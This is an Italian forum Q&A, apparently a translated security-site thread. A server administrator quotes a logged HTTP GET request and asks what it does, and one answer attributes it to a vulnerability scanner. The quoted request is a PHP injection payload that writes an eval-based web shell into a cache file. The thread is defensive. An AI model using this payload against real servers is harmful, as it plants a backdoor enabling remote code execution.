Esecuzione della funzione PHP attraverso la richiesta HTTP GET di hacker [duplicato]

Naviga le tue risposte
0

Riceviamo continuamente richieste successive sul nostro server Apache dagli hacker 

?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);
@set_magic_quotes_runtime(0);echo%20'-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCRIPT_FILENAME'%5D).'/cache/cachee.php','%3C?php%20eval($_POST%5Bshine%5D);?%3E');echo%20'%7C%3C-'; HTTP/1.1 200 42673

Aiutaci a farmi sapere quale tipo di tentativo di hacking è questo? non ci sono cache.php sul server, ma l'hacker sta ricevendo 200 risposta HTTP .

ci sono circa 200 richieste come questa. questo attacco causerà gravi minacce alla sicurezza sul server?

Sarebbe bello se qualcuno mi spiegasse il significato della funzione PHP usata nella richiesta precedente.

    
posta Pawan Patil 20.09.2017 - 06:32
fonte

1 risposta

1

Si sta tentando di ripristinare alcune delle funzioni di init di PHP. Principalmente attivando errori su schermo, disattivando virgolette (aiuta con SQLI) e scrivendo un file.

Stanno ottenendo una risposta di 200 poiché questa è solo una stringa di query, che potrebbe essere qualsiasi URL con questa query aggiunta.

Molto probabilmente sarà solo uno scanner in cerca di vulnerabilità. Potresti agire per bloccare l'IP, l'agente utente ecc.

    
risposta data 20.09.2017 - 10:30
fonte

Leggi altre domande sui tag

Buon libro su PCI DSS? [chiuso] Gestione password personale. Come conservare le password [chiuso]